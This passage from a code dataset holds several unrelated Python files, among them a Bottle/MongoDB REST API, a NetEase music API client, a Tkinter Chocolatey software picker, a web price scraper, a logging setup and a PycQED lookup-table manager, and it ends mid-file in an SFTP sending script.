IFLoop.join()\n","sub_path":"InteractionFreeLocal/Instrument/WaveformGenerator/USTCDAC/USTCAWGServer.py","file_name":"USTCAWGServer.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"498227616","text":"import json\nimport ast\nfrom bottle import route, run, request, abort, response\nfrom json import dumps\nfrom bson import ObjectId, json_util\nimport pymongo\nimport serverconfig as cfg\n\nmyclient = pymongo.MongoClient(cfg.mongoServer)\nmydb = myclient[cfg.mongoClient]\nmycol = mydb[cfg.mongoDb]\n\n\n#\n# Route for adding single recdord\n#\n\n@route('/stat', method='PUT')\ndef put_document():\n data = request.body.readline()\n if not data:\n abort(400, 'No data received')\n entity = json.loads(data.decode('utf-8'))\n\n# entity = json.loads(data)\n x = mycol.insert_one(entity)\n rv = [{ \"id\": str(x.inserted_id)}]\n response.content_type = 'application/json'\n return dumps(rv)\n\n#\n# Route for adding bulk records\n#\n\n@route('/statbulk', method='PUT')\ndef put_document():\n data = request.body.readline()\n if not data:\n abort(400, 'No data received')\n\n entity = json.loads(data.decode('utf-8'))\n x = mycol.insert_many(entity)\n entity = x.inserted_ids\n page_sanitized = json.loads(json_util.dumps(entity))\n response.content_type = 'application/json'\n return dumps(page_sanitized)\n\n#\n# Route for getting single document\n#\n\n@route('/stat/:id', method='GET')\ndef get_document(id):\n entity = mycol.find_one({'_id': ObjectId(id)})\n if not entity:\n abort(404, 'No document with id %s' % id)\n\n page_sanitized = json.loads(json_util.dumps(entity))\n return page_sanitized\n\n#\n# Route for get list of documents with pagination and filters\n# Pagination: page = X\n# Limit: limit = Y\n#\n# Params:\n# page - pagination param\n# limit - documents per page. 
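# Example request combining the params above with a filter ('price' is a\n# hypothetical document field; the filters value is parsed with ast.literal_eval):\n#   GET /list?page=0&limit=5&filters={'price': {'$gt': 100}}\n#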
Default value is 10\n#\n# Filter syntax:\n# $eq\tMatches values that are equal to a specified value.\n# $gt\tMatches values that are greater than a specified value.\n# $gte\tMatches values that are greater than or equal to a specified value.\n# $in\tMatches any of the values specified in an array.\n# $lt\tMatches values that are less than a specified value.\n# $lte\tMatches values that are less than or equal to a specified value.\n# $ne\tMatches all values that are not equal to a specified value.\n# $nin\tMatches none of the values specified in an array.\n#\n\n@route('/list', method='GET')\ndef get_document_page():\n page = request.query.page\n limit = request.query.limit\n filters = {}\n\n if request.query.filters:\n filters = ast.literal_eval(request.query.filters)\n\n if not limit:\n limit = 10\n\n if not page:\n entity = mycol.find(filters).limit(int(limit)).sort(\"id\", pymongo.DESCENDING)\n\n else:\n entity = mycol.find(filters).skip(int(page) * int(limit)).limit(int(limit)).sort(\"id\", pymongo.DESCENDING)\n page_sanitized = json.loads(json_util.dumps(entity))\n response.content_type = 'application/json'\n return dumps(page_sanitized)\n\nrun(host='0.0.0.0', port=8089)","sub_path":"myrestapi.py","file_name":"myrestapi.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"372121858","text":"# netease music api\n# coding:utf-8\n\ndefault_timeout = 10\n\nimport json\nimport requests\nimport hashlib\n\nclass NetEase:\n\n # create header & cookies\n def __init__(self):\n self.header = {\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.8,gl;q=0.6,zh-TW;q=0.4',\n 'Connection': 'keep-alive',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Host': 'music.163.com',\n 'Referer': 'http://music.163.com/search/',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'\n }\n self.cookies = {\n 'appver': '1.5.2'\n }\n\n # create httpRequest, get & post\n def httpRequest(self, method, action, query = None, urlendoded = None, callback = None, timeout = None):\n if(method == 'GET'):\n url = action if (query == None) else (action + '?' 
+ query)\n            connection = requests.get(url, headers = self.header, timeout = default_timeout)\n        elif(method == 'POST'):\n            connection = requests.post(\n                action,\n                data = query,\n                headers = self.header,\n                timeout = default_timeout\n            )\n\n        connection.encoding = \"UTF-8\"\n        connection = json.loads(connection.text)\n        return connection\n\n    # login\n    def login(self, username, password):\n        action = 'http://music.163.com/api/login/'\n        data = {\n            'username': username,\n            'password': hashlib.md5(password.encode('utf-8')).hexdigest(),\n            'rememberLogin': 'true'\n        }\n        try:\n            return self.httpRequest('POST', action, data)\n        except:\n            return {'code': 501}\n\n    # get username or userid\n    def username(self, user):\n        return user['profile']['nickname']\n\n    def userid(self, user):\n        return user['account']['id']\n\n    # user's list\n    def user_list(self, uid, offset = 0, limit = 100):\n        action = 'http://music.163.com/api/user/playlist/?offset=' + str(offset) + '&limit=' + str(limit) + '&uid=' + str(uid)\n        try:\n            data = self.httpRequest('GET', action)\n            return self.dig_info(data['playlist'], 'list')\n        except:\n            return []\n\n    # get new songs list\n    def new_songs(self, offset = 0, limit = 100):\n        action = 'http://music.163.com/api/discovery/new/songs?areaId=0&offset=' + str(offset) + '&total=true&limit=' + str(limit)\n        try:\n            data = self.httpRequest('GET', action)\n            return self.dig_info(data['data'], 'song')\n        except:\n            return []\n\n    # get new top list\n    def top_list(self, category = '全部', order = 'hot', offset = 0, limit = 50):\n        action = 'http://music.163.com/api/playlist/list?cat=' + category + '&order=' + order + '&offset=' + str(offset) + '&total=' + ('true' if offset else 'false') + '&limit=' + str(limit)\n        try:\n            data = self.httpRequest('GET', action)\n            return self.dig_info(data['playlists'], 'list')\n        except:\n            return []\n\n    # artist id --> artist's songs\n    def artist(self, artist_id):\n        action = 'http://music.163.com/api/artist/' + str(artist_id)\n        try:\n            data = self.httpRequest('GET', action)\n            return self.dig_info(data['hotSongs'], 'song')\n        except:\n            return []\n\n    # album id --> songs\n    def album(self, album_id):\n        action = 'http://music.163.com/api/album/' + str(album_id)\n        try:\n            data = self.httpRequest('GET', action)\n            return self.dig_info(data['album']['songs'], 'song')\n        except:\n            return []\n\n    # list id --> list tracks\n    def list_details(self, list_id):\n        action = 'http://music.163.com/api/playlist/detail?id=' + str(list_id)\n        try:\n            data = self.httpRequest('GET', action)\n            return self.dig_info(data['result']['tracks'], 'song')\n        except:\n            return []\n\n    # songs' id --> song urls\n    def songs_detail(self, ids, offset = 0):\n        tmpids = ids[offset:]\n        tmpids = tmpids[0:100]\n        tmpids = map(str, tmpids)\n        action = 'http://music.163.com/api/song/detail?ids=[' + (',').join(tmpids) + ']'\n        try:\n            data = self.httpRequest('GET', action)\n            return self.dig_info(data['songs'], 'song')\n        except:\n            return []\n\n    # song id --> song url\n    def song_detail(self, music_id):\n        action = \"http://music.163.com/api/song/detail/?id=\" + str(music_id) + \"&ids=[\" + str(music_id) + \"]\"\n        try:\n            data = self.httpRequest('GET', action)\n            return self.dig_info(data['songs'], 'song')\n        except:\n            return []\n\n    # search: query string --> result\n    def raw_search(self, s, stype = 1, offset = 0, total = 'true', limit = 100):\n        action = 'http://music.163.com/api/search/get/web'\n        data = {\n            's': s,\n            'type': stype,\n            'offset': offset,\n            'total': total,\n            'limit': limit\n        }\n        return self.httpRequest('POST', action, data)\n\n    # search filter: data returned from search --> songs' important info\n    # songs: 1 | album: 10 | artist: 100 | list: 1000\n
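    # e.g. (editor's example) self.search('Hello', 1) returns a list of song dicts,\n    # while self.search('Hello', 100) returns artist dicts via dig_info() below.\n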
    def search(self, s, type):\n        data = self.raw_search(s, type)\n        if type == 1:\n            songs_id = []\n            if 'mp3Url' in data['result']['songs']:\n                songs = data['result']['songs']\n            else:\n                for i in range(0, len(data['result']['songs']) ):\n                    songs_id.append( data['result']['songs'][i]['id'] )\n                songs = self.songs_detail(songs_id)\n            return self.dig_info(songs, 'song')\n\n        elif type == 10:\n            return self.dig_info(data['result']['albums'], 'album')\n\n        elif type == 100:\n            return self.dig_info(data['result']['artists'], 'artist')\n\n        elif type == 1000:\n            return self.dig_info(data['result']['playlists'], 'list')\n\n    # data --> song info: get important info from data\n    def dig_info(self, data, dig_type):\n        temp = []\n        if dig_type == 'song':\n            for i in range(0, len(data)):\n                song_info = {\n                    'song_id': data[i]['id'],\n                    'artist': [],\n                    'song_name': data[i]['name'],\n                    'album_name': data[i]['album']['name'],\n                    'mp3_url': data[i]['mp3Url']\n                }\n                if 'artist' in data[i]:\n                    song_info['artist'] = data[i]['artist']\n                elif 'artists' in data[i]:\n                    for j in range(0, len(data[i]['artists'])):\n                        song_info['artist'].append(data[i]['artists'][j]['name'])\n                    song_info['artist'] = ', '.join(song_info['artist'])\n                else:\n                    song_info['artist'] = '未知艺术家'\n\n                temp.append(song_info)\n\n        elif dig_type == 'artist':\n            temp = []\n            for i in range(0, len(data)):\n                artists_info = {\n                    'artist_id': data[i]['id'],\n                    'artist_name': data[i]['name'],\n                    'alias': ''.join(data[i]['alias'])\n                }\n                temp.append(artists_info)\n\n            return temp\n\n        elif dig_type == 'album':\n            for i in range(0, len(data)):\n                albums_info = {\n                    'album_id': data[i]['id'],\n                    'album_name': data[i]['name'],\n                    'artist_name': data[i]['artist']['name']\n                }\n                temp.append(albums_info)\n\n        elif dig_type == 'list':\n            for i in range(0, len(data)):\n                playlists_info = {\n                    'list_id': data[i]['id'],\n                    'list_name': data[i]['name'],\n                    'creator_name': data[i]['creator']['nickname']\n                }\n                temp.append(playlists_info)\n\n        elif dig_type == 'channel':\n            channel_info = {\n                'song_id': data['id'],\n                'song_name': data['name'],\n                'artist': data['artists'][0]['name'],\n                'album_name': 'DJ',\n                'mp3_url': data['mp3Url']\n            }\n            temp = channel_info\n\n        return temp","sub_path":"server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"256126411","text":"from tkinter import *\n\n\ndef fermerlafenetre():\n    windows3.quit()\n    windows3.destroy()\n\n\n\nwindows3 = Tk()\nwindows3.geometry(\"1024x720\")\nwindows3.config(background=\"#197de1\")\nw = Label(windows3, text ='Delectionner les logiciels que vous ne voulez pas installer', font = \"50\", bg=(\"white\"), fg=(\"#ED7F46\"))\nw.pack()\n\nCheckbutton1 = IntVar()\nCheckbutton2 = IntVar()\nCheckbutton3 = IntVar()\nCheckbutton4 = IntVar()\nCheckbutton5 = IntVar()\nCheckbutton6 = IntVar()\nCheckbutton7 = IntVar()\nCheckbutton8 = IntVar()\nCheckbutton9 = IntVar()\nCheckbutton10 = IntVar()\n### checked by default\nCheckbutton1.set(1)\nCheckbutton2.set(1)\nCheckbutton3.set(1)\nCheckbutton4.set(1)\nCheckbutton5.set(1)\nCheckbutton6.set(1)\nCheckbutton7.set(1)\nCheckbutton8.set(1)\nCheckbutton9.set(1)\nCheckbutton10.set(1)\n\nButton1 = Checkbutton(windows3, text = \"choco install adobereader\",\n                    variable = Checkbutton1,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\nButton2 = Checkbutton(windows3, text = \"choco install firefox\",\n                    variable = Checkbutton2,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n
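# (Editor's sketch, hypothetical refactor with behavior unchanged:) the ten\n# near-identical checkbutton blocks in this script could be generated in a loop:\n#   packages = [\"choco install adobereader\", \"choco install firefox\", ...]\n#   variables = [IntVar(value=1) for _ in packages]\n#   buttons = [Checkbutton(windows3, text=p, variable=v, onvalue=1, offvalue=0,\n#                          height=2, width=50) for p, v in zip(packages, variables)]\n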
\nButton3 = Checkbutton(windows3, text = \"choco install googlechrome\",\n                    variable = Checkbutton3,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\nButton4 = Checkbutton(windows3, text = \"choco install openvpn-community\",\n                    variable = Checkbutton4,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\nButton5 = Checkbutton(windows3, text = \"choco install javaruntime\",\n                    variable = Checkbutton5,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\nButton6 = Checkbutton(windows3, text = \"choco install keepass\",\n                    variable = Checkbutton6,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\nButton7 = Checkbutton(windows3, text = \"choco install 7zip.install\",\n                    variable = Checkbutton7,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\nButton8 = Checkbutton(windows3, text = \"choco install naps2\",\n                    variable = Checkbutton8,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\nButton9 = Checkbutton(windows3, text = \"choco install tightvnc\",\n                    variable = Checkbutton9,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\nButton10 = Checkbutton(windows3, text = \"choco install libreoffice\",\n                    variable = Checkbutton10,\n                    onvalue = 1,\n                    offvalue = 0,\n                    height = 2,\n                    width = 50)\n\n\nButton1.pack()\nButton2.pack()\nButton3.pack()\nButton4.pack()\nButton5.pack()\nButton6.pack()\nButton7.pack()\nButton8.pack()\nButton9.pack()\nButton10.pack()\n\n## we create a frame to manage the position of our widgets; we indicate where to place it, here it is windows3\n# To visualize this frame we can add the parameters: bd=1, relief=SUNKEN\nframe = Frame(windows3, bg=(\"#197de1\"), bd=1, relief=SUNKEN)\n# add a first button\nInstall_software = Button(frame, text=\"Cliquer pour Valider\", font=(\"Courrier\", 25), bg=(\"white\"), fg=(\"#ED7F46\"), command=fermerlafenetre)\n## vertical margin of the button => pady = 25, and horizontal fill => fill=X\nInstall_software.pack(pady=25, fill=X)\n## add the frame\nframe.pack(expand=YES)\n\nmainloop()\n\n\n\n\nmeslogiciels = []\nprint(Checkbutton1.get())\nprint(Checkbutton2.get())\nprint(Checkbutton3.get())\nif Checkbutton1.get() == 1:\n    meslogiciels.append(\"choco install -y adobereader\")\nif Checkbutton2.get() == 1:\n    meslogiciels.append(\"choco install firefox\")\nif Checkbutton3.get() == 1:\n    meslogiciels.append(\"choco install googlechrome\")\nif Checkbutton4.get() == 1:\n    meslogiciels.append(\"choco install openvpn-community\")\nif Checkbutton5.get() == 1:\n    meslogiciels.append(\"choco install javaruntime\")\nif Checkbutton6.get() == 1:\n    meslogiciels.append(\"choco install keepass\")\nif Checkbutton7.get() == 1:\n    meslogiciels.append(\"choco install 7zip.install\")\nif Checkbutton8.get() == 1:\n    meslogiciels.append(\"choco install naps2\")\nif Checkbutton9.get() == 1:\n    meslogiciels.append(\"choco install tightvnc\")\nif Checkbutton10.get() == 1:\n    meslogiciels.append(\"choco install libreoffice\")\n\n\n\nfor value in meslogiciels:\n    print(value)\n","sub_path":"Chocolatey/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"237104352","text":"import logging\n\nfrom fastapi.applications import FastAPI\n\nfrom utilities.logging.sinks import add_terminal_sink, add_custom_sink, add_file_sink\nfrom utilities.logging.handlers import LoggingIntercepter, http_request_logging_middleware\nfrom loguru import logger\n\n\ndef 
_clear_default_logging_handlers(prefix=''):\n \"\"\"\n Clears the handlers for all existing loggers.\n Provide a logger prefix to limit the set of loggers\n to clear handlers for.\n \"\"\"\n loggers = (\n logging.getLogger(name)\n for name in logging.root.manager.loggerDict\n if name.startswith(prefix)\n )\n for log in loggers:\n log.handlers = []\n\n\ndef _clear_default_loguru_handlers():\n logger.configure(handlers=[])\n\n\ndef initialize_logging():\n \"\"\"\n Initializes logging handlers and sinks. New sinks and handlers\n should be registered in this function.\n \"\"\"\n\n # Uvicorn is set up with default loggers.\n # We override them here in order to control how, when, and where\n # uvicorn (and all other) logs are handled.\n _clear_default_logging_handlers(prefix='uvicorn.')\n _clear_default_loguru_handlers()\n\n # Intercept all uvicorn logs so we can process them as we see fit\n logging.getLogger(\"uvicorn\").handlers = [LoggingIntercepter()]\n\n # All logs emitted by 1) the intercepter and 2) all loguru.logger.* method calls\n # will be sent to a loguru sink. Sinks are simply destinations for logging data.\n # By default, we add two sinks; one for sending logs to the console and to a file.\n # To send logs to a database, e.g. an Elasticsearch instance, simply add a custom\n # sink to send the data there.\n # See https://loguru.readthedocs.io/en/stable/api/logger.html for details.\n add_file_sink(logger)\n add_terminal_sink(logger)\n\n # Arbitrary sinks to process raw log records (for sending to log databases for example)\n # can be configured as such:\n \n # add_custom_sink(logger, lambda record: print(\n # f'Received raw log record: {record}'\n # ))\n\n\ndef initialize_logging_middleware(app: FastAPI):\n app.middleware(\"http\")(http_request_logging_middleware)\n","sub_path":"iq-test/utilities/logging/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"437633036","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom . import z_standart\n\n\ndef get_scu(phpsessid, search_text):\n url = 'http://auto.irbis.ua/price/'+search_text+'/'\n headers = {\n 'Host': 'auto.irbis.ua',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Referer': 'http://auto.irbis.ua/price/AL12/',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'uk-UA,uk;q=0.8,ru;q=0.6,en-US;q=0.4,en;q=0.2',\n 'Cookie': 'PHPSESSID='+phpsessid+'; user_auth_session=1; _ga=GA1.2.2088670763.1505318465; _gid=GA1.2.411157468.1505590944; _gat=1',\n }\n\n r = requests.get(url, headers=headers)\n print('irbis: get_scu status:', r.status_code)\n dataset = []\n # if r.status_code == 503:\n # data = {'desc_full': 'IRBIS don`t response... 
'}\n # dataset.append(data)\n # # print(dataset)\n # return dataset\n\n soup = BeautifulSoup(r.content, 'html5lib')\n\n trs = soup.find_all('tr', id=re.compile('^tr'))\n if len(trs) == 0:\n dataset = [{'desc': 'nothing found on request...', 'price': '0.00', 'home1': '0', 'home2': '0', 'other': '0'}]\n return dataset\n #print(len(trs))\n for i, tr in enumerate(trs):\n data = {}\n\n tds = tr.find_all('td')\n # print(i, tds)\n if len(tds) > 1:\n # print(tds)\n try:\n brand = tds[0].find('a').get_text().lstrip()\n # data.update({'brand': standartization(brand)})\n #print(brand)\n\n number = tds[1].find('a').get_text().lstrip()\n # data.update({'number': number})\n # print(number)\n brand, number = z_standart.standartization(brand, number)\n data.update({'brand': brand, 'number': number})\n\n url_buy = tds[1].find('a')['href']\n data.update({'url_buy': 'http://auto.irbis.ua' + url_buy})\n # print(url_buy)\n\n desc = tds[2].get_text().lstrip().rstrip()\n data.update({'desc': desc})\n data.update({'desc_full': desc})\n # print(desc)\n\n price = tds[4].get_text().replace(' грн.', '').strip()\n price = price.replace('Распродажа товаров', '')\n price = price.replace('---', '0.00')\n data.update({'price': price})\n # print(price)\n\n try:\n img = tds[3].find('img').get('src')\n data.update({'img': img})\n # print(img)\n except:\n pass\n\n # get rest\n rests = tds[5].find_all('option')\n rest_data = {'home1': '0', 'home2': '0', 'other': 0}\n plus_flag = False\n for rest_row in rests:\n item = rest_row.get_text().split(' ')\n # print(item)\n if item[0] == 'Киев':\n home1 = item[2].replace('шт', '')\n if '>' in home1:\n home1 = home1.replace('>', '')\n rest_data.update({'home1_bold': 'bold'})\n plus_flag = True\n rest_data.update({'home1': home1})\n elif item[0] == 'Харьков':\n home2 = item[2].replace('шт', '')\n if '>' in home2:\n home2 = home2.replace('>', '')\n rest_data.update({'home2_bold': 'bold'})\n plus_flag = True\n rest_data.update({'home2': home2})\n elif item[0] == 'Под':\n pass\n else:\n other_loc = int(item[2].replace('шт', '').replace('>', '')) + rest_data['other']\n rest_data.update({'other': other_loc})\n\n if plus_flag:\n rest_data.update({'other_bold': 'bold'})\n # print(rest_data)\n data.update(rest_data)\n except:\n pass\n\n if len(data) > 1:\n # print(data, len(data))\n dataset.append(data)\n\n # try:\n # del dataset[0]\n # del dataset[1]\n # except:\n # pass\n if len(dataset) == 0:\n dataset = [{'desc': 'nothing found on request...', 'price': '0.00', 'home1': '0', 'home2': '0', 'other': '0'}]\n\n return dataset\n\n# print(get_scu(user_auth, phpsessid, search_text))\n","sub_path":"async_search/irbis.py","file_name":"irbis.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162347007","text":"\nimport numpy as np\nfrom qcodes.instrument.base import Instrument\nfrom qcodes.instrument.parameter import ManualParameter\nfrom qcodes.utils import validators as vals\nimport logging\nfrom pycqed.measurement import Pulse_Generator as PG\nimport unittest\nimport matplotlib.pyplot as plt\nimport imp\nfrom pycqed.analysis.fit_toolbox import functions as func\n\nimp.reload(PG)\n\nglobal lm # Global used for passing value to the testsuite\n\n\nclass UHFQC_LookuptableManagerManager(Instrument):\n\n '''\n meta-instrument that can produce multiplexed pulses by adding pulses\n from different lookupotable managers.\n\n For now this is a test version that only stores the parameters for a\n specific set of 
pulses.\n '''\n shared_kwargs = ['UHFQC']\n\n def __init__(self, name, UHFQC, **kw):\n\n logging.warning('The UHFQC_LookuptableManagerManager is deprecated')\n logging.info(__name__ + ' : Initializing instrument')\n super().__init__(name, **kw)\n\n\n self.UHFQC = UHFQC\n self.add_parameter('mixer_QI_amp_ratio', vals=vals.Numbers(),\n parameter_class=ManualParameter,\n initial_value=1.0)\n self.add_parameter('mixer_IQ_phase_skewness', vals=vals.Numbers(),\n unit='deg',\n parameter_class=ManualParameter,\n initial_value=0.0)\n # These parameters are added for mixer skewness correction.\n # They are intended to be renamed such that they can be combined with\n # mixer_QI_amp_ratio and mixer_IQ_phase_skewness.\n self.add_parameter('mixer_alpha', vals=vals.Numbers(),\n parameter_class=ManualParameter,\n initial_value=1.0)\n self.add_parameter('mixer_phi', vals=vals.Numbers(), unit='deg',\n parameter_class=ManualParameter,\n initial_value=0.0)\n self.add_parameter('mixer_apply_predistortion_matrix', vals=vals.Bool(),\n parameter_class=ManualParameter,\n initial_value=False)\n\n self.add_parameter('acquisition_delay', vals=vals.Numbers(), unit='s',\n parameter_class=ManualParameter,\n initial_value=270e-9)\n self.add_parameter('LutMans', vals=vals.Anything(),\n set_cmd=self._attach_lutmans_to_Lutmanman)\n self.add_parameter('sampling_rate', vals=vals.Numbers(), unit='Hz',\n parameter_class=ManualParameter,\n initial_value=1.8e9)\n\n # Set to a default because box is not expected to change\n self._voltage_min = -1.0\n self._voltage_max = 1.0-1.0/2**13\n\n def _attach_lutmans_to_Lutmanman(self, LutMans):\n for LutMan in LutMans:\n LutManthis = self.find_instrument(LutMan)\n # equivalent to: self.LutMan= LutManthis\n setattr(self, LutMan, LutManthis)\n\n def generate_multiplexed_pulse(self, multiplexed_wave):\n '''\n Generates a basic set of pulses (I, X-180, Y-180, x-90, y-90, Block,\n X180_delayed)\n using the parameters set on this meta-instrument and returns the\n corresponding waveforms for both I and Q channels as a dict.\n\n Note the primitive set is a different set than the one used in\n Serwan's thesis.\n '''\n # Standard qubit pulses\n\n # RO pulses\n Wave_multi_I = np.array(np.zeros(2))\n Wave_multi_Q = np.array(np.zeros(2))\n for LutMan, pulse in multiplexed_wave:\n print(\"loading {} from {}\".format(pulse, LutMan))\n LutManthis = self.find_instrument(LutMan)\n Wave_element_I, Wave_element_Q = LutManthis.give_back_wave_forms(\n pulse_name=pulse)\n # Add to Wave_multi_I resize to check that the lengths are OK\n if len(Wave_element_I) > len(Wave_multi_I):\n Wave_multi_I.resize(Wave_element_I.shape)\n Wave_multi_I = Wave_multi_I+Wave_element_I\n Wave_multi_Q.resize(Wave_element_Q.shape)\n Wave_multi_Q = Wave_multi_Q+Wave_element_Q\n else:\n Wave_element_I.resize(Wave_multi_I.shape)\n Wave_multi_I = Wave_multi_I+Wave_element_I\n Wave_element_Q.resize(Wave_multi_Q.shape)\n Wave_multi_Q = Wave_multi_Q+Wave_element_Q\n\n Wave_multi = [Wave_multi_I, Wave_multi_Q]\n self._wave_dict = {'Multiplexed_pulse': Wave_multi}\n\n if self.mixer_apply_predistortion_matrix():\n M = self.get_mixer_predistortion_matrix()\n for key, val in self._wave_dict.items():\n self._wave_dict[key] = np.dot(M, val)\n\n return self._wave_dict\n\n def render_wave(self, wave_name, show=True, time_unit='lut_index'):\n fig, ax = plt.subplots(1, 1)\n if time_unit == 'lut_index':\n x = np.arange(len(self._wave_dict[wave_name][0]))\n ax.set_xlabel('Lookuptable index (i)')\n ax.vlines(\n 2048, self._voltage_min, self._voltage_max, 
linestyle='--')\n elif time_unit == 's':\n x = (np.arange(len(self._wave_dict[wave_name][0]))\n / self.sampling_rate.get())\n ax.set_xlabel('Time (s)')\n ax.vlines(2048 / self.sampling_rate.get(),\n self._voltage_min, self._voltage_max, linestyle='--')\n print(wave_name)\n ax.set_title(wave_name)\n ax.plot(x, self._wave_dict[wave_name][0],\n marker='o', label='chI')\n ax.plot(x, self._wave_dict[wave_name][1],\n marker='o', label='chQ')\n ax.set_ylabel('Amplitude (V)')\n ax.set_axis_bgcolor('gray')\n ax.axhspan(self._voltage_min, self._voltage_max, facecolor='w',\n linewidth=0)\n ax.legend()\n ax.set_ylim(self._voltage_min*1.1, self._voltage_max*1.1)\n ax.set_xlim(0, x[-1])\n if show:\n plt.show()\n return fig, ax\n\n def render_wave_PSD(self, wave_name, show=True,\n f_bounds=None, y_bounds=None):\n fig, ax = plt.subplots(1, 1)\n f_axis, PSD_I = func.PSD(\n self._wave_dict[wave_name][0], 1/self.sampling_rate())\n f_axis, PSD_Q = func.PSD(\n self._wave_dict[wave_name][1], 1/self.sampling_rate())\n\n ax.set_xlabel('frequency (Hz)')\n ax.set_title(wave_name)\n ax.plot(f_axis, PSD_I,\n marker='o', label='chI')\n ax.plot(f_axis, PSD_Q,\n marker='o', label='chQ')\n ax.set_ylabel('Spectral density (V^2/Hz)')\n ax.legend()\n\n ax.set_yscale(\"log\", nonposy='clip')\n if y_bounds is not None:\n ax.set_ylim(y_bounds[0], y_bounds[1])\n if f_bounds is not None:\n ax.set_xlim(f_bounds[0], f_bounds[1])\n if show:\n plt.show()\n return fig, ax\n\n def get_mixer_predistortion_matrix(self):\n '''\n predistortion matrix correcting for a mixer with amplitude\n mismatch \"mixer_alpha\" and skewness \"phi\"\n\n M = [ 1 tan(phi) ]\n [ 0 1/mixer_alpha * sec(phi)]\n\n Notes on the procedure for acquiring this matrix can be found in\n PycQED/docs/notes/MixerSkewnessCalibration_LDC_150629.pdf\n\n Note: The same effect as the predistortion matrix can also be achieved\n by setting the IQ-phase skewness and QI-amp-ratio paramters.\n '''\n\n mixer_pre_distortion_matrix = np.array(\n ((1, np.tan(self.get('mixer_phi')*2*np.pi/360)),\n (0, 1/self.get('mixer_alpha') * 1/np.cos(self.get('mixer_phi')*2*np.pi/360))))\n return mixer_pre_distortion_matrix\n\n def load_pulse_onto_AWG_lookuptable(self, pulse_name):\n '''\n Load a pulses to the lookuptable, it uses the lut_mapping to\n determine which lookuptable to load to.\n '''\n\n wave_dict = self._wave_dict\n I_wave = np.clip(wave_dict[pulse_name][0],\n self._voltage_min, self._voltage_max)\n Q_wave = np.clip(np.multiply(self.get('mixer_QI_amp_ratio'),\n wave_dict[pulse_name][1]), self._voltage_min,\n self._voltage_max)\n self.UHFQC.awg_sequence_acquisition_and_pulse(\n I_wave, Q_wave, self.acquisition_delay())\n\n def give_back_wave_forms(self, pulse_name):\n '''\n Load a pulses to the lookuptable, it uses the lut_mapping to\n determine which lookuptable to load to.\n '''\n wave_dict = self._wave_dict\n I_wave = np.clip(wave_dict[pulse_name][0],\n self._voltage_min, self._voltage_max)\n Q_wave = np.clip(np.multiply(self.get('mixer_QI_amp_ratio'),\n wave_dict[pulse_name][1]), self._voltage_min,\n self._voltage_max)\n return I_wave, Q_wave\n","sub_path":"deprecated/pycqed/instrument_drivers/meta_instrument/UHFQC_LookuptableManagerManager.py","file_name":"UHFQC_LookuptableManagerManager.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582488300","text":"import datetime\nimport os\nimport tempfile\nfrom pathlib import Path, PurePosixPath\nfrom typing import List, Union\n\nimport 
click\nimport paramiko\n\nfrom sending.curation_files import (\n LogFiles,\n NewFiles,\n PepFiles,\n PidFiles,\n SeqFiles,\n SubFiles,\n TrEMBLFiles,\n)\n\nREMOTE_HOST_NAME = os.environ.get(\"REMOTE_HOST_NAME\", \"remote host\")\n\n\nSEND_HELP = \"Sends all curated files to the remote FTP server.\"\n\n\n@click.command(help=SEND_HELP)\ndef send() -> None:\n \"\"\"Main entry point for send command.\n\n Sends all curated files to the remote FTP server.\n \"\"\"\n\n # Load curation files objects\n trembl_files = TrEMBLFiles()\n new_files = NewFiles()\n pep_files = PepFiles()\n sub_files = SubFiles()\n logfiles = LogFiles()\n pid_files = PidFiles()\n seq_files = SeqFiles()\n\n # Load FTP credentials\n try:\n remote_server = os.environ[\"REMOTE_SERVER\"]\n remote_user = os.environ[\"REMOTE_USER\"]\n remote_key = os.environ[\"REMOTE_KEY\"]\n known_hosts = os.environ[\"KNOWN_HOSTS\"]\n except KeyError as err:\n raise click.ClickException(\n f\"Could not detect an environment variable for {err}s.\"\n )\n\n # Create SFTP connection and do the transfers\n try:\n key = paramiko.Ed25519Key.from_private_key_file(remote_key)\n except FileNotFoundError as err:\n raise click.ClickException(\n f\"There was a problem loading 